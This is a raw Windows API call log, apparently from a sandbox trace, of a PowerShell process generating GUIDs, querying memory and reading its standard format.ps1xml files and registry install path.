	[0352.152] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0352.152] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0352.153] CoCreateGuid (in: pguid=0x1cd770 | out: pguid=0x1cd770*(Data1=0x76c6a7bb, Data2=0x8e97, Data3=0x4962, Data4=([0]=0x8f, [1]=0xa2, [2]=0xde, [3]=0xd5, [4]=0x6e, [5]=0xd, [6]=0xad, [7]=0x47))) returned 0x0
	[0352.153] CoCreateGuid (in: pguid=0x1cd770 | out: pguid=0x1cd770*(Data1=0x4ba14420, Data2=0xd96c, Data3=0x434e, Data4=([0]=0x99, [1]=0x3d, [2]=0x34, [3]=0x6e, [4]=0x80, [5]=0x9f, [6]=0x22, [7]=0x62))) returned 0x0
	[0352.153] CoCreateGuid (in: pguid=0x1cd770 | out: pguid=0x1cd770*(Data1=0x7433aa89, Data2=0x33, Data3=0x4f12, Data4=([0]=0x85, [1]=0x0, [2]=0xd0, [3]=0x7a, [4]=0xd3, [5]=0xf7, [6]=0x0, [7]=0x42))) returned 0x0
	[0352.153] CoCreateGuid (in: pguid=0x1cd770 | out: pguid=0x1cd770*(Data1=0x478df917, Data2=0x7444, Data3=0x40a8, Data4=([0]=0xbf, [1]=0xe6, [2]=0x34, [3]=0xc8, [4]=0xc6, [5]=0x4f, [6]=0x2, [7]=0xd2))) returned 0x0
	[0352.153] CoCreateGuid (in: pguid=0x1cd770 | out: pguid=0x1cd770*(Data1=0xcb9dc475, Data2=0x5eb6, Data3=0x4c40, Data4=([0]=0xb6, [1]=0x59, [2]=0x40, [3]=0x38, [4]=0x9f, [5]=0xe8, [6]=0xec, [7]=0xc0))) returned 0x0
	[0352.154] CoCreateGuid (in: pguid=0x1cd770 | out: pguid=0x1cd770*(Data1=0x849463b2, Data2=0xd716, Data3=0x4555, Data4=([0]=0xa1, [1]=0x57, [2]=0xf7, [3]=0x1, [4]=0xec, [5]=0x3a, [6]=0xba, [7]=0x31))) returned 0x0
	[0352.154] CoCreateGuid (in: pguid=0x1cd770 | out: pguid=0x1cd770*(Data1=0x9dd157b1, Data2=0xfde3, Data3=0x4364, Data4=([0]=0xb1, [1]=0x74, [2]=0x7c, [3]=0x8d, [4]=0xb9, [5]=0xe3, [6]=0x5a, [7]=0xad))) returned 0x0
	[0352.154] VirtualQuery (in: lpAddress=0x1cc120, lpBuffer=0x1ccfe0, dwLength=0x30 | out: lpBuffer=0x1ccfe0*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0352.154] CoCreateGuid (in: pguid=0x1cd770 | out: pguid=0x1cd770*(Data1=0xf72854f3, Data2=0x1cae, Data3=0x4d09, Data4=([0]=0xaf, [1]=0x9f, [2]=0xf1, [3]=0xb8, [4]=0x63, [5]=0x14, [6]=0x78, [7]=0x6f))) returned 0x0
	[0352.154] CoCreateGuid (in: pguid=0x1cd770 | out: pguid=0x1cd770*(Data1=0x95dfeb6c, Data2=0x14fc, Data3=0x4334, Data4=([0]=0x95, [1]=0x2b, [2]=0x7f, [3]=0x99, [4]=0x8f, [5]=0x8d, [6]=0x31, [7]=0x26))) returned 0x0
	[0352.154] CoCreateGuid (in: pguid=0x1cd770 | out: pguid=0x1cd770*(Data1=0xd806625f, Data2=0x47c1, Data3=0x4ffe, Data4=([0]=0x89, [1]=0xa8, [2]=0x4b, [3]=0x83, [4]=0xd0, [5]=0x47, [6]=0xa7, [7]=0x4c))) returned 0x0
	[0352.154] CoCreateGuid (in: pguid=0x1cd770 | out: pguid=0x1cd770*(Data1=0x722e8386, Data2=0xba1b, Data3=0x4ccd, Data4=([0]=0x8b, [1]=0x8, [2]=0x6b, [3]=0x9b, [4]=0xa, [5]=0x53, [6]=0x57, [7]=0xeb))) returned 0x0
	[0352.154] CoCreateGuid (in: pguid=0x1cd770 | out: pguid=0x1cd770*(Data1=0x2597760b, Data2=0xf61, Data3=0x4e8f, Data4=([0]=0x80, [1]=0x99, [2]=0x1, [3]=0x64, [4]=0x38, [5]=0xcc, [6]=0x84, [7]=0xa7))) returned 0x0
	[0352.154] CoCreateGuid (in: pguid=0x1cd770 | out: pguid=0x1cd770*(Data1=0xc86a323d, Data2=0x6393, Data3=0x459f, Data4=([0]=0x90, [1]=0xa7, [2]=0x11, [3]=0x20, [4]=0x95, [5]=0xc1, [6]=0xd6, [7]=0x30))) returned 0x0
	[0352.154] CoCreateGuid (in: pguid=0x1cd770 | out: pguid=0x1cd770*(Data1=0x7914f34f, Data2=0x8817, Data3=0x4b32, Data4=([0]=0x98, [1]=0x6a, [2]=0xec, [3]=0xa3, [4]=0xcb, [5]=0x6, [6]=0x6, [7]=0xc6))) returned 0x0
	[0352.154] CoCreateGuid (in: pguid=0x1cd770 | out: pguid=0x1cd770*(Data1=0xd106fab6, Data2=0xe398, Data3=0x49fa, Data4=([0]=0xab, [1]=0x99, [2]=0x8d, [3]=0x9c, [4]=0x92, [5]=0xf7, [6]=0x43, [7]=0xf2))) returned 0x0
	[0352.155] CoCreateGuid (in: pguid=0x1cd770 | out: pguid=0x1cd770*(Data1=0x4fb8d21a, Data2=0x1995, Data3=0x4a30, Data4=([0]=0x9d, [1]=0x79, [2]=0x5c, [3]=0x77, [4]=0xdb, [5]=0xa2, [6]=0x94, [7]=0x12))) returned 0x0
	[0352.155] CoCreateGuid (in: pguid=0x1cd770 | out: pguid=0x1cd770*(Data1=0xafbdd5c0, Data2=0x86e0, Data3=0x4c5a, Data4=([0]=0x99, [1]=0x61, [2]=0xfc, [3]=0x81, [4]=0x41, [5]=0x0, [6]=0x67, [7]=0xb))) returned 0x0
	[0352.155] CoCreateGuid (in: pguid=0x1cd770 | out: pguid=0x1cd770*(Data1=0xb14fc45f, Data2=0xe746, Data3=0x4ce6, Data4=([0]=0xab, [1]=0xbd, [2]=0x7a, [3]=0xc0, [4]=0xf3, [5]=0x4f, [6]=0xf, [7]=0x90))) returned 0x0
	[0352.155] CoCreateGuid (in: pguid=0x1cd770 | out: pguid=0x1cd770*(Data1=0x7917cd40, Data2=0x2231, Data3=0x4e31, Data4=([0]=0x89, [1]=0x78, [2]=0x75, [3]=0x5e, [4]=0x6e, [5]=0x10, [6]=0x56, [7]=0xf2))) returned 0x0
	[0352.155] VirtualQuery (in: lpAddress=0x1cc120, lpBuffer=0x1ccfe0, dwLength=0x30 | out: lpBuffer=0x1ccfe0*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0352.155] VirtualQuery (in: lpAddress=0x1cc120, lpBuffer=0x1ccfe0, dwLength=0x30 | out: lpBuffer=0x1ccfe0*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0352.155] VirtualQuery (in: lpAddress=0x1cc120, lpBuffer=0x1ccfe0, dwLength=0x30 | out: lpBuffer=0x1ccfe0*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0352.155] CoCreateGuid (in: pguid=0x1cd770 | out: pguid=0x1cd770*(Data1=0x52175f8b, Data2=0x900e, Data3=0x4aa4, Data4=([0]=0xa5, [1]=0xfd, [2]=0x7e, [3]=0xa6, [4]=0xf7, [5]=0xf7, [6]=0xef, [7]=0x5d))) returned 0x0
	[0352.156] CoCreateGuid (in: pguid=0x1cd770 | out: pguid=0x1cd770*(Data1=0x53db9009, Data2=0x64f7, Data3=0x46a0, Data4=([0]=0x96, [1]=0xa7, [2]=0xa5, [3]=0x5e, [4]=0x98, [5]=0xbe, [6]=0x3e, [7]=0x37))) returned 0x0
	[0352.156] CoCreateGuid (in: pguid=0x1cd770 | out: pguid=0x1cd770*(Data1=0x9688b2f7, Data2=0xa94c, Data3=0x4553, Data4=([0]=0x90, [1]=0xe2, [2]=0x16, [3]=0xf2, [4]=0xfc, [5]=0x1b, [6]=0xe5, [7]=0x4))) returned 0x0
	[0352.156] CoCreateGuid (in: pguid=0x1cd770 | out: pguid=0x1cd770*(Data1=0xcd24c39, Data2=0x4411, Data3=0x40fa, Data4=([0]=0x9d, [1]=0x2e, [2]=0x8a, [3]=0xbc, [4]=0xf3, [5]=0xb6, [6]=0x47, [7]=0x2f))) returned 0x0
	[0352.156] CoCreateGuid (in: pguid=0x1cd770 | out: pguid=0x1cd770*(Data1=0x131d6112, Data2=0xd1a6, Data3=0x43d3, Data4=([0]=0xa2, [1]=0xd3, [2]=0x3d, [3]=0x6b, [4]=0xd5, [5]=0x41, [6]=0x39, [7]=0xc9))) returned 0x0
	[0352.156] CoCreateGuid (in: pguid=0x1cd770 | out: pguid=0x1cd770*(Data1=0x60c6f117, Data2=0x8da8, Data3=0x4fac, Data4=([0]=0x88, [1]=0xfc, [2]=0x69, [3]=0xf2, [4]=0x3d, [5]=0x1f, [6]=0x45, [7]=0x88))) returned 0x0
	[0352.156] CoCreateGuid (in: pguid=0x1cd770 | out: pguid=0x1cd770*(Data1=0x1911272, Data2=0xf4e5, Data3=0x4419, Data4=([0]=0x81, [1]=0x9b, [2]=0x3c, [3]=0x6a, [4]=0xa7, [5]=0xba, [6]=0xe7, [7]=0xe7))) returned 0x0
	[0352.156] CoCreateGuid (in: pguid=0x1cd770 | out: pguid=0x1cd770*(Data1=0xd863305f, Data2=0xebad, Data3=0x4cc0, Data4=([0]=0xa7, [1]=0x8f, [2]=0x24, [3]=0x5e, [4]=0x76, [5]=0x49, [6]=0xb5, [7]=0xce))) returned 0x0
	[0352.156] CoCreateGuid (in: pguid=0x1cd770 | out: pguid=0x1cd770*(Data1=0x8ae2c3b0, Data2=0x9bfc, Data3=0x4237, Data4=([0]=0xb3, [1]=0xdf, [2]=0x83, [3]=0x7e, [4]=0x1, [5]=0xaa, [6]=0x1f, [7]=0x5b))) returned 0x0
	[0352.156] CoCreateGuid (in: pguid=0x1cd770 | out: pguid=0x1cd770*(Data1=0x2fb1db51, Data2=0xaa9a, Data3=0x4f20, Data4=([0]=0xa4, [1]=0x6a, [2]=0xf9, [3]=0xc9, [4]=0x61, [5]=0xa0, [6]=0x2d, [7]=0xed))) returned 0x0
	[0352.156] CoCreateGuid (in: pguid=0x1cd770 | out: pguid=0x1cd770*(Data1=0xd22631dd, Data2=0xc18e, Data3=0x49ea, Data4=([0]=0x8b, [1]=0x5a, [2]=0xe6, [3]=0x2a, [4]=0x29, [5]=0xd3, [6]=0x82, [7]=0xa7))) returned 0x0
	[0352.157] CoCreateGuid (in: pguid=0x1cd770 | out: pguid=0x1cd770*(Data1=0x358e9506, Data2=0xc76f, Data3=0x47c1, Data4=([0]=0x8e, [1]=0x8a, [2]=0x36, [3]=0xf8, [4]=0xe0, [5]=0x6, [6]=0x79, [7]=0xb9))) returned 0x0
	[0352.157] CoCreateGuid (in: pguid=0x1cd770 | out: pguid=0x1cd770*(Data1=0x5476074, Data2=0x1a46, Data3=0x4fa4, Data4=([0]=0xac, [1]=0xde, [2]=0x35, [3]=0xbe, [4]=0xe7, [5]=0x64, [6]=0x88, [7]=0xa0))) returned 0x0
	[0352.157] VirtualQuery (in: lpAddress=0x1cc120, lpBuffer=0x1ccfe0, dwLength=0x30 | out: lpBuffer=0x1ccfe0*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0352.157] CoCreateGuid (in: pguid=0x1cd770 | out: pguid=0x1cd770*(Data1=0x5c3e6ed6, Data2=0x2d2d, Data3=0x4aba, Data4=([0]=0xa6, [1]=0x47, [2]=0x40, [3]=0x23, [4]=0x6f, [5]=0x83, [6]=0xf4, [7]=0x24))) returned 0x0
	[0352.157] VirtualQuery (in: lpAddress=0x1cc120, lpBuffer=0x1ccfe0, dwLength=0x30 | out: lpBuffer=0x1ccfe0*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0352.158] VirtualQuery (in: lpAddress=0x1cc120, lpBuffer=0x1ccfe0, dwLength=0x30 | out: lpBuffer=0x1ccfe0*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0352.158] CoCreateGuid (in: pguid=0x1cd770 | out: pguid=0x1cd770*(Data1=0x2b1c143c, Data2=0x711b, Data3=0x451d, Data4=([0]=0xad, [1]=0x56, [2]=0x95, [3]=0xde, [4]=0xa1, [5]=0x95, [6]=0x18, [7]=0x7))) returned 0x0
	[0352.158] VirtualQuery (in: lpAddress=0x1cc120, lpBuffer=0x1ccfe0, dwLength=0x30 | out: lpBuffer=0x1ccfe0*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0352.158] CoCreateGuid (in: pguid=0x1cd770 | out: pguid=0x1cd770*(Data1=0x926100a6, Data2=0x5e8a, Data3=0x4aff, Data4=([0]=0xa1, [1]=0x70, [2]=0x4f, [3]=0x62, [4]=0x89, [5]=0xf4, [6]=0x9e, [7]=0x22))) returned 0x0
	[0352.158] CoCreateGuid (in: pguid=0x1cd770 | out: pguid=0x1cd770*(Data1=0x968c6861, Data2=0x6841, Data3=0x416f, Data4=([0]=0xb9, [1]=0xf7, [2]=0xad, [3]=0xbc, [4]=0xde, [5]=0x19, [6]=0x62, [7]=0x13))) returned 0x0
	[0352.158] CoCreateGuid (in: pguid=0x1cd770 | out: pguid=0x1cd770*(Data1=0xa888d241, Data2=0xa141, Data3=0x42ad, Data4=([0]=0x9c, [1]=0xfa, [2]=0x2e, [3]=0xfd, [4]=0x17, [5]=0x97, [6]=0x20, [7]=0x95))) returned 0x0
	[0352.158] CoCreateGuid (in: pguid=0x1cd770 | out: pguid=0x1cd770*(Data1=0x3c7c58ec, Data2=0x5db6, Data3=0x44d4, Data4=([0]=0xa6, [1]=0xbc, [2]=0xf3, [3]=0xb9, [4]=0xa0, [5]=0xb2, [6]=0xa6, [7]=0x5f))) returned 0x0
	[0352.159] CoCreateGuid (in: pguid=0x1cd770 | out: pguid=0x1cd770*(Data1=0x4df28b97, Data2=0x168b, Data3=0x44e2, Data4=([0]=0x83, [1]=0xa5, [2]=0x82, [3]=0x70, [4]=0xc7, [5]=0xd5, [6]=0xf6, [7]=0x3a))) returned 0x0
	[0352.159] CoCreateGuid (in: pguid=0x1cd770 | out: pguid=0x1cd770*(Data1=0x88e046ca, Data2=0xea7d, Data3=0x4942, Data4=([0]=0xb3, [1]=0x92, [2]=0x27, [3]=0xea, [4]=0x2, [5]=0x26, [6]=0x1, [7]=0x86))) returned 0x0
	[0352.159] CoCreateGuid (in: pguid=0x1cd770 | out: pguid=0x1cd770*(Data1=0xa39314ff, Data2=0xeb2b, Data3=0x4356, Data4=([0]=0xa0, [1]=0x24, [2]=0x8e, [3]=0x8a, [4]=0x3, [5]=0x92, [6]=0x7d, [7]=0x3d))) returned 0x0
	[0352.159] VirtualQuery (in: lpAddress=0x1cc120, lpBuffer=0x1ccfe0, dwLength=0x30 | out: lpBuffer=0x1ccfe0*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0352.159] CoCreateGuid (in: pguid=0x1cd770 | out: pguid=0x1cd770*(Data1=0xa0449cd5, Data2=0x8114, Data3=0x4d01, Data4=([0]=0x87, [1]=0xed, [2]=0x6c, [3]=0x74, [4]=0xb4, [5]=0x99, [6]=0xcd, [7]=0xe1))) returned 0x0
	[0352.159] CoCreateGuid (in: pguid=0x1cd770 | out: pguid=0x1cd770*(Data1=0xe92d30fa, Data2=0x6d53, Data3=0x4ad1, Data4=([0]=0xbe, [1]=0x5b, [2]=0x94, [3]=0xce, [4]=0x47, [5]=0x98, [6]=0xfe, [7]=0x10))) returned 0x0
	[0352.159] CoCreateGuid (in: pguid=0x1cd770 | out: pguid=0x1cd770*(Data1=0x5cfe67ea, Data2=0x4e13, Data3=0x485f, Data4=([0]=0xa9, [1]=0xf, [2]=0x26, [3]=0xa5, [4]=0x17, [5]=0x4a, [6]=0x22, [7]=0xc2))) returned 0x0
	[0352.159] CoCreateGuid (in: pguid=0x1cd770 | out: pguid=0x1cd770*(Data1=0x562ffb2b, Data2=0x9f08, Data3=0x42f0, Data4=([0]=0x91, [1]=0xb6, [2]=0x43, [3]=0x9c, [4]=0x53, [5]=0x70, [6]=0x3c, [7]=0xc2))) returned 0x0
	[0352.159] CoCreateGuid (in: pguid=0x1cd770 | out: pguid=0x1cd770*(Data1=0x63415ab2, Data2=0x83b5, Data3=0x46e9, Data4=([0]=0x96, [1]=0x5, [2]=0x5a, [3]=0xf8, [4]=0x24, [5]=0xb0, [6]=0x10, [7]=0x76))) returned 0x0
	[0352.159] VirtualQuery (in: lpAddress=0x1cc120, lpBuffer=0x1ccfe0, dwLength=0x30 | out: lpBuffer=0x1ccfe0*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0352.159] CoCreateGuid (in: pguid=0x1cd770 | out: pguid=0x1cd770*(Data1=0xff9a116f, Data2=0x6dd8, Data3=0x4bbd, Data4=([0]=0x98, [1]=0x1b, [2]=0x98, [3]=0x15, [4]=0xd7, [5]=0x9, [6]=0xce, [7]=0xf0))) returned 0x0
	[0352.160] CoCreateGuid (in: pguid=0x1cd770 | out: pguid=0x1cd770*(Data1=0x4cbf5a3b, Data2=0xdc98, Data3=0x42d3, Data4=([0]=0xae, [1]=0x1b, [2]=0x88, [3]=0x3e, [4]=0x25, [5]=0x7, [6]=0x92, [7]=0x8c))) returned 0x0
	[0352.160] VirtualQuery (in: lpAddress=0x1cc190, lpBuffer=0x1cd050, dwLength=0x30 | out: lpBuffer=0x1cd050*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0352.160] VirtualQuery (in: lpAddress=0x1cc190, lpBuffer=0x1cd050, dwLength=0x30 | out: lpBuffer=0x1cd050*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0352.160] VirtualQuery (in: lpAddress=0x1cc190, lpBuffer=0x1cd050, dwLength=0x30 | out: lpBuffer=0x1cd050*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0352.160] VirtualQuery (in: lpAddress=0x1cc190, lpBuffer=0x1cd050, dwLength=0x30 | out: lpBuffer=0x1cd050*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0352.160] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0352.160] SetErrorMode (uMode=0x1) returned 0x1
	[0352.160] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x320
	[0352.160] GetFileType (hFile=0x320) returned 0x1
	[0352.160] SetErrorMode (uMode=0x1) returned 0x1
	[0352.160] GetFileType (hFile=0x320) returned 0x1
	[0352.160] ReadFile (in: hFile=0x320, lpBuffer=0x30c3f18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x30c3f18*, lpNumberOfBytesRead=0x1cd4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0352.161] ReadFile (in: hFile=0x320, lpBuffer=0x30c3f18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x30c3f18*, lpNumberOfBytesRead=0x1cd4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0352.161] ReadFile (in: hFile=0x320, lpBuffer=0x30c3f18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x30c3f18*, lpNumberOfBytesRead=0x1cd4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0352.161] ReadFile (in: hFile=0x320, lpBuffer=0x30c3f18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x30c3f18*, lpNumberOfBytesRead=0x1cd4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0352.161] ReadFile (in: hFile=0x320, lpBuffer=0x30c3f18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x30c3f18*, lpNumberOfBytesRead=0x1cd4b8*=0x8b4, lpOverlapped=0x0) returned 1
	[0352.161] ReadFile (in: hFile=0x320, lpBuffer=0x30c3334, nNumberOfBytesToRead=0x34c, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x30c3334*, lpNumberOfBytesRead=0x1cd4b8*=0x0, lpOverlapped=0x0) returned 1
	[0352.161] ReadFile (in: hFile=0x320, lpBuffer=0x30c3f18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x30c3f18*, lpNumberOfBytesRead=0x1cd4b8*=0x0, lpOverlapped=0x0) returned 1
	[0352.161] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0352.161] SetErrorMode (uMode=0x1) returned 0x1
	[0352.161] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd460 | out: lpFileInformation=0x1cd460*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0352.162] SetErrorMode (uMode=0x1) returned 0x1
	[0352.162] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0352.162] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd548 | out: phkResult=0x1cd548*=0x320) returned 0x0
	[0352.162] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd4cc, lpData=0x0, lpcbData=0x1cd4c8*=0x0 | out: lpType=0x1cd4cc*=0x1, lpData=0x0, lpcbData=0x1cd4c8*=0x56) returned 0x0
	[0352.162] CoTaskMemAlloc (cb=0x5a) returned 0x46ed50
	[0352.162] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd49c, lpData=0x46ed50, lpcbData=0x1cd498*=0x56 | out: lpType=0x1cd49c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1cd498*=0x56) returned 0x0
	[0352.162] CoTaskMemFree (pv=0x46ed50) 
	[0352.162] RegCloseKey (hKey=0x320) returned 0x0
	[0352.162] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0352.162] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0352.162] CoCreateGuid (in: pguid=0x1cd770 | out: pguid=0x1cd770*(Data1=0xdc7f0f79, Data2=0x6add, Data3=0x41f1, Data4=([0]=0x9f, [1]=0xfd, [2]=0x7d, [3]=0xe3, [4]=0x9, [5]=0x83, [6]=0x2d, [7]=0xc5))) returned 0x0
	[0352.162] CoCreateGuid (in: pguid=0x1cd770 | out: pguid=0x1cd770*(Data1=0xb11d45ac, Data2=0xec3e, Data3=0x447b, Data4=([0]=0xbd, [1]=0xfb, [2]=0x62, [3]=0x3f, [4]=0xdf, [5]=0x56, [6]=0xb6, [7]=0xb0))) returned 0x0
	[0352.163] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0352.163] SetErrorMode (uMode=0x1) returned 0x1
	[0352.163] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x320
	[0352.163] GetFileType (hFile=0x320) returned 0x1
	[0352.163] SetErrorMode (uMode=0x1) returned 0x1
	[0352.163] GetFileType (hFile=0x320) returned 0x1
	[0352.163] ReadFile (in: hFile=0x320, lpBuffer=0x3101d00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x3101d00*, lpNumberOfBytesRead=0x1cd4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0352.163] ReadFile (in: hFile=0x320, lpBuffer=0x3101d00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x3101d00*, lpNumberOfBytesRead=0x1cd4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0352.163] ReadFile (in: hFile=0x320, lpBuffer=0x3101d00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x3101d00*, lpNumberOfBytesRead=0x1cd4b8*=0x1000, lpOverlapped=0x0) returned 1
